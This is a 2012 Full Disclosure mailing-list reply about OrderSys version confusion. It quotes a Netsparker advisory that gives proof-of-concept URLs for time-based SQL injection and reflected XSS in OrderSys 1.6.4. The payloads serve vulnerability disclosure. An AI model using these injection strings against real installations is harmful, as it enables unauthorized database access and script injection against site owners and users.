Full Disclosure mailing list archives
Re: XSS and SQL Injection Vulnerabilities in OrderSys
From: muuratsalo experimental hack lab <muuratsalo () gmail com>
Date: Sat, 25 Aug 2012 02:37:26 +0200
Dear all, first of all thanks to Henri for pointing it out (on the LabWiki discussion). I am trying to be as clear as possible even if my English is really poor! I have to say that the author answered to me every time in just one hour and I had not any problem in contacting him. He has been always very kind so it is quite difficult to me to believe that he didn't answered to other researchers. The only problem was that the author was updating all his softwares (LabWiki, LabStoRe and OrderSys) *** WITHOUT*** changing the version number. I asked him to do put the softwares offline but he didn't wanted to follow my suggestion. The results were that there have been online more than 20 different softwares with the same version number.I can give evidence to it, the author can give evidence too. I think that the researcher of Mavituna Security downloaded a version on the website and just tested one alpha version under development. I have to say that there was not any clear clarification of this so they were absolutely right in testing what they believed to be the current stable version. Only after some weeks I have asked the author to point it out on the website that all the softwares were under development due to security issues and that's what he did. Regards, muuratsalo 2012/8/22 Netsparker Advisories <advisories () mavitunasecurity com>:
Information -------------------- Name : XSS and SQL Injection Vulnerabilities in OrderSys Software : OrderSys 1.6.4 and possibly below. Vendor Homepage : http://www.bioinformatics.org/phplabware/labwiki/index.php Vulnerability Type : Cross-Site Scripting and SQL Injection Severity : Critical Researcher : Canberk Bolat Advisory Reference : NS-12-007 Description -------------------- The OrderSys system was originally developed at an academic research laboratory to simplify the filling of order forms that could be printed for handing over to a departmental office which processed the orders. The details for items and vendors, and order histories, could be stored in tables of a MySQL database, thereby saving time and effort of looking up catalog numbers, price, etc., budgeting, order follow ups, and preventing unnecessary ordering as well as illegibilities inherent to handwritten ordering. The system can be easily used for other purposes. Details -------------------- OrderSys is affected by XSS and SQL Injection vulnerabilities in version 1.6.4. Example PoC urls are as follows : SQL Injection Vulnerabilities http://example.com/ordering/items.php?smenu_1=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&sterm_1=3&sbool=AND&smenu_2=Name&sterm_2=3&order_1=ASC&order_2=ASC&sort_1=3&sort_2=3 http://example.com/ordering/vendors.php?smenu_1=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&sterm_1=3&sbool=AND&smenu_2=Name&sterm_2=3&order_1=ASC&order_2=ASC&sort_1=3&sort_2=3&submit_find=Find XSS Vulnerabilities http://example.com/ordering/items.php?page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0007B1)%3C/script%3E&where_condition=3&order_condition=name%20ASC http://example.com/ordering/vendors.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9)) http://example.com/ordering/items.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9)) http://example.com/ordering/orders.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9)) http://example.com/ordering/interface_creator/index_short.php?table_name=item&function=details&where_field='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0008F1)%3C/script%3E&where_value=279 http://example.com/ordering/interface_creator/index_short.php?table_name=vendor&function=search&where_clause='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000F5B)%3C/script%3E&page=0&order=Name&order_type=DESC http://example.com/ordering/interface_creator/index_short.php?table_name=vendor&function=search&where_clause=3&page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000F79)%3C/script%3E&order=Name&order_type=DESC http://example.com/ordering/interface_creator/login.php?function='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0008F4)%3C/script%3E&go_to=(http%3A%2F%2Fubuntu%2Ftargets%2Fordersys%2Fordering%2Fadmin.php) http://example.com/ordering/interface_creator/login.php?function=admin&go_to='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000902)%3C/script%3E http://example.com/ordering/interface_creator/?function=search&where_clause='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000C70)%3C/script%3E&page=0&table_name=vendor http://example.com/ordering/interface_creator/?function=search&where_clause=3&page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000C96)%3C/script%3E&table_name=vendor http://example.com/ordering/interface_creator/index_long.php?table_name=vendor&function=search&where_clause='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B34)%3C/script%3E&page=0&order=Name&order_type=DESC http://example.com/ordering/interface_creator/index_long.php?table_name=vendor&function=search&where_clause=3&page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B3F)%3C/script%3E&order=Name&order_type=DESC You can read the full article about Cross-Site Scripting and SQL Injection vulnerabilities from here : Cross-site Scripting: http://www.mavitunasecurity.com/crosssite-scripting-xss/ SQL Injection: http://www.mavitunasecurity.com/sql-injection/ Solution -------------------- No patch released. Advisory Timeline -------------------- 15/11/2011 - First contact: No response 01/01/2012 - Second contact: No response 22/08/2012 - Advisory Released Credits -------------------- It has been discovered on testing of Netsparker, Web Application Security Scanner - http://www.mavitunasecurity.com/netsparker/. References -------------------- MSL Advisory Link : http://www.mavitunasecurity.com/xss-and-sql-injection-vulnerabilities-in-ordersys/ Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/ About Netsparker -------------------- Netsparker® can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on. Netsparker's unique detection and exploitation techniques allows it to be dead accurate in reporting hence it's the first and the only False Positive Free web application security scanner. -- Netsparker Advisories, <advisories () mavitunasecurity com> Homepage, http://www.mavitunasecurity.com/netsparker-advisories/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- XSS and SQL Injection Vulnerabilities in OrderSys Netsparker Advisories (Aug 22)
- Re: XSS and SQL Injection Vulnerabilities in OrderSys muuratsalo experimental hack lab (Aug 24)